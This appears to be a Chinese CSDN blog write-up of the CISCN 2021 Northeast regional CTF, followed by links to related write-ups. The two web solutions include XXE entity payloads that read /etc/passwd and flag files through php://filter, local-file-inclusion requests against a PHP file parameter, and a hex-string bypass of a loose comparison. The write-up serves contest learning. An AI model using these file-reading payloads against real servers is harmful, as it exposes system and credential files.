ciscn2021东北赛区分区赛

最新推荐文章于 2024-06-14 09:49:52 发布
最新推荐文章于 2024-06-14 09:49:52 发布
阅读量642 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kingdring/article/details/117935561
版权

ciscn2021东北赛区分区赛

++Spirit k1ling
感谢Dazz1e大佬陪我看了很久hh

summary

3720pt,rank11
晋级名单还没出,不过大概率是前10进,正好卡掉了,就差一步到罗马,真的意难平…
但是想想自己菜成这样全靠gs带也就释然了一些
这东西就跟S赛一样,今年没了你就要咽下所有的不甘,然后更加努力,等着明年杀回来
++Spirit绝不会止步于此
今年进第二轮之后改了个名,k某人想去ciscn决赛,去决赛之前不改名,不管哪年,flag立这了。

misc

签到

工具扫二维码即可

flag{this_is_flag!gogogo}

web

flagin

拿到题目,抓包发现表单内容是这样的

<user><username>1;</username><password>1</password></user>

怀疑是xxe

上payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>

发现第一行被waf了,删掉

可以读到passwd,去读flag

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///flag.txt">
]>

回显读取flag的姿势不对

换协议filter

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=///flag.txt">
]>

回显一段base64

ZmxhZ3s0OTc5MDBhYThmMmZjNTU3NmI0ZGEzZmNkNzhjMDA4ZH0=

flag{497900aa8f2fc5576b4da3fcd78c008d}

be careful

进去环境看到file=1.php

猜测也可以读文件

file=///etc/passwd

可以读到内容

读一下index.php,没回显

猜测又是协议问题,换filter

file=php://filter/read=convert.base64-encode/resource=index.php

读到了index.php的源码

<html>
    <title>I advise you to do good</title>
<?php
    error_reporting(0);
    if(!$_GET[file]){echo '<a href="./index.php?file=1.php">Be Careful</a>';}
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,'F14ggg.php')||stristr($file,"input")||stristr($file,"data")){
        echo "I advise you to do good!";
        exit();
    }
    include($file); 
//real_flag.php
?>
</html>

可以看到不能路径穿越,不能ftp,不能直接访问flag等等

但是注释里面有一个real_flag.php

读一下

file=php://filter/read=convert.base64-encode/resource=real_flag.php

源码是这样的

<?php
include('F14ggg.php');
$a = $_GET['a'];
$one = ord('1'); 
$nine = ord('9'); 
$number = '69563214562';
for ($i = 0; $i < strlen($number); $i++)
{
	$digit = ord($a{$i});
    echo $digit;
	if ( ($digit >= $one) && ($digit <= $nine) )
	{
		echo 'wrong';
	}

	elseif($number == $a)
	{
		echo $flag;
	}
}
?>

可以看到,只要在11位长度之内,存在一位不是1-9之间的字符,并且使得$a与69563214562相等,即可echo $flag;

考虑hex绕过,原因有二:

  • hex前缀是0x,必然不在1-9之内
  • php可以比较16进制与10进制

因此请求 /real_flag.php?a=0x10324a6ae2

flag为

flag{ny2w6iezylnlamxfijufowhcpevjqdzd}

「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
2022 ciscn 东北赛区分区赛 部分 wp
qq_23321269的博客
06-19 5603
2022 ciscn 东北分区赛 部分wp
CISCN分区赛东北部分wp
Htt9999的博客
06-27 748
东北分区赛部分wp
2024全国大学生信息安全竞赛(ciscn)半决赛(东北赛区)Pwn题解
最新发布
返璞归真的博客
06-14 916
2024全国大学生信息安全竞赛(ciscn)半决赛东北赛区Pwn题解
ciscn-2022 东北赛区分区赛 RE-hana
qq_34010404的博客
07-20 523
逆向太菜了,当时没逆出来,今天复现一下,虽然出了,但是是下断点断出来的…
ciscn2021 西北分区赛部分pwn
mishixiaodai的博客
06-07 270
xb_pwn_easy 分析发现是道整数溢出的题,unsigned int8最大数为255,当输入的数字超出255时就会发生溢出。但当时做题我将v4输为0,也可以造成溢出,原因是read的第三个参数v4-1=-1,又read的第三个参数类型是size_t,当输入负值时,会将其转换为无符号数。 利用整数溢出漏洞,可以覆盖age、email、phone,可以将email覆盖为函数的got地址,这样就可以获得函数的地址并且得到libc的基地址。 修改puts函数的got表。一开始我将phone覆盖为puts_
CISCN2022东北赛区复赛Writeup-MapleLeaves
Do1phln的博客
06-19 3147
Do1phln b477ery sfc9982 0HB密文中字母跨度在 G-K 间,不禁让人想往 A-F 平移,平移后即为且全部为可打印 ASCII 文本。 拖入本地离线 CyberChef 中先使用Base32,再使用Base85 IP method 解密得到 flag分析音频,无有效信息。加之题目体制侧重于文件方向,使用 010 Editor 打开音频文件,在尾部发现类似 Base64 的文本信息,经过两次解密后得到某个东西的密码。 初步考虑文件内含压缩包或者音频存在隐写信息。经多个工具尝试过后发现
CISCN2021 西北赛区分区赛 Web xb_web_flask_trick
feng的博客
06-08 780
前言 6.5号去了兰州打了分区赛,4道Web出了web1和web4,web2和web3都不会。这题flask是web3,讲道理对我这种对flask不熟悉的弟弟来说还是挺难的,比赛的时候只有西电的一个队伍出了。今天晚上在学长的帮助下终于出了这道题,也是学到了很多的东西。 源码 import os from flask import Flask, request, abort, session app = Flask(__name__) app.config["SECRET_KEY"] = os.urand
下载思科模拟器Cisco packet Tracer 8.2.2
05-28
Cisco packet Tracer 8.2.2用于思科实验,练习使用。非常方便。
思科cisco实验内容练习.zip
09-25
思科模拟器各种设备练习,包含1.交换机的基本配置2.连接有线和无线配置3.第 3 层交换机4.路由器基本配置及排除i 5.pv4和ipv6编址6.子网划分7.服务器8.无线路由器9.扩展练习-.端口安全
思科MIB库 cisco mib库
10-14
标题中的“思科MIB库 cisco mib库”指的是思科公司为他们的网络设备提供的MIB资源集合。这些库包含了用于描述和访问思科交换机、路由器以及其他网络设备管理信息的结构化数据。 描述中的“思科V2MIB库”提及的是...
思科仿真模拟器cisco packet tracer6.2
03-07
cisco packet tracer 6.2是由思科推出的一款仿真模拟器,主要用于思科各类设备的模拟学习操作,包括交换机、路由器的模拟,旨在帮助初学者进行各类网络的设计、配置、排除网络故障等,用户还可以在软件的图形用户...
Zeitgeist-Cisco-Hackathon-2021:思科Hackathon 2021
03-15
【标题】"Zeitgeist-Cisco-Hackathon-2021:思科Hackathon 2021" 涉及的是一个由科技巨头思科主办的编程竞赛,其主题聚焦于医疗追踪领域的创新应用。这个活动鼓励参赛者利用各种技术手段,特别是区块链技术,来解决...
BUUCTF-[CISCN2019 华东北赛区]Web2
AndyNoel的博客
05-13 397
BUUCTF-[CISCN2019 华东北赛区]Web2 看题 一个论坛,内容不错:) 可以投稿,点击投稿发现要注册,那就先注册登录。随便账号密码就行。 常规操作,扫一下站点,发现有admin.php,进行访问 思路 有session,可以确定一个思路,获取管理员的session得到权限,然后拿到flag 执行 去投稿,发现存在XSS漏洞,但是有一些过滤,''(''被转义成了"(",存在WAF,先转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新页面 使用
ciscn 2022 华东北分区赛pwn blue
z1r0的博客
07-02 781
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
ciscn 2022 华东北分区赛pwn bigduck
z1r0的博客
07-01 720
这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了沙盒,禁用了execve 所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2
ciscn 华中赛区分区赛 awd pwn2
yongbaoii的博客
07-15 460
libc 2.27 record 结构还是比较清晰的。 申请了一个大小为0x110的chunk。前0x10是mark,后0x100是msg。 在最后八个字节那里,维护了一个单链表。 scrape 也就是删除,但是在删除链表尾的时候有uaf。 browser 就是输出,上面花里胡哨的也没啥用,然后有个格式化字符串漏洞。 rewrite 可以重新写一下。 backdoor 也是在做一个输出。 漏洞有俩,一个格式化字符串,一个uaf。 uaf利用半天利用不出来,格式化字符串倒是简单。 exp from p.
2021 ciscn 华中赛区分区赛 pwn note
yongbaoii的博客
09-02 390
libc 2.31 保护是都拉上的。 刚开始有个花指令,通过一定的调整,再反汇编,就得到了正确的结果。 可以看到除了必要的初始化setbuf之外还将4050的地方清空了。 后面我们会看到4050就是存放地址的地方。 add 看一下content的输入 很明显的off by one。 整体结构还是比较清晰的,最多申请三个chunk。 free 清理的很干净。 show show也是正常泄露。 很明显的off by one,我们的常规思路也就是overlap或者unlink。 因为这里泄露不了基地址,所以我
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1149
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
WP-CISCN2021
热门推荐
ce666666的博客
06-14 1万+
前言 这次比赛让我看到只学习一门方向的痛苦。web平台修复,队友在疯狂做题,你却只能在旁边看着却不能帮助。有些题就是悍得悍死,捞得捞死。 Web 简单的注入 一道延时注入,我却在反复测试是否为联合还是其他注入,尝试fuzz,手工注入真的菜。 还是得靠sqlmap注入 Payload: 爆库:sqlmap.py –r txt –risk=3 --level=3 –p password –dbs 爆表:sqlmap.py –r txt –risk=3 –-level=3 –p password –D “数据库名
思科Cisco ASR9000网络虚拟化技术详解
"思科Cisco ASR9000网络虚拟化技术整体介绍" 思科Cisco ASR9000系列路由器是企业级的核心和边缘网络解决方案,其网络虚拟化(nV)技术是构建高效、可扩展且易于管理的现代网络的关键组成部分。nV技术旨在通过整合...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值